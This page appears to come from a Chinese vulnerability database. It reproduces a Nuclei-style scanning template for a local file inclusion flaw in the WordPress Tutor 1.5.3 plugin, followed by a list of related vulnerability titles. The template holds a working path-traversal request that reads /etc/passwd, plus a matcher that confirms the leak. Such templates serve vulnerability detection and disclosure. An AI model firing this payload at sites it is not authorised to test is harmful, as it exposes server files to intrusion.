wp-tutor-lfi: WordPress tutor 1.5.3 - Local File Inclusion

漏洞描述

PoC代码[已公开]

id: wp-tutor-lfi

info:
  name: WordPress tutor 1.5.3 - Local File Inclusion
  author: 0x240x23elu
  severity: high
  description: WordPress tutor.1.5.3 is vulnerable to local file inclusion.
  reference:
    - https://www.exploit-db.com/exploits/48058
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: wordpress,wp-plugin,lfi,edb,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=/etc/passwd"

    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
        part: body
# digest: 4b0a004830460221008312386d728a3ce9c89a568f06fa79ef13fef90d099bc5f8e15360af58aed5a1022100abac0db59fb1b4692e2735434427e666f1cc0d34d6180ee5ad32d87ff4ac8ca6:922c64590222798bb761d5b6d8e72950

相关漏洞推荐

• WordPress Plugin Alone Theme /wp-admin/admin-ajax.php beplus_import_pack_install_plugin 文件上传漏洞（CVE-2025-5394）
• Ilevia EVE X1 Server /ajax/php/leaf_replace_device.php 命令执行漏洞
• WordPress Time Clock 插件 /wp-admin/admin-ajax.php 代码执行漏洞 （CVE-2024-9593）
• WordPress Ditty /wp-json/dittyeditor/v1/displayItems 服务器端请求伪造漏洞
• RuoYi AI /prod-api/system/model/list 信息泄露漏洞（CVE-2025-3199）
• Ilevia EVE X1 Server /ajax/history/get_history_data_odic.php 命令执行漏洞
• JM-DATA ONU JF511-TV 安全漏洞
• JM-DATA ONU JF511-TV 跨站请求伪造漏洞
• JM-DATA ONU JF511-TV 跨站脚本漏洞
• SohuTV CacheCloud 跨站脚本漏洞 (CVE-2025-15221)
• Campcodes Park 跨站脚本漏洞（CVE-2025-15214）
• POC MongoDB 存在未授权内存泄露漏洞（CVE-2025-14847）
• PX4 Autopilot栈溢出漏洞（CVE-2025-15150）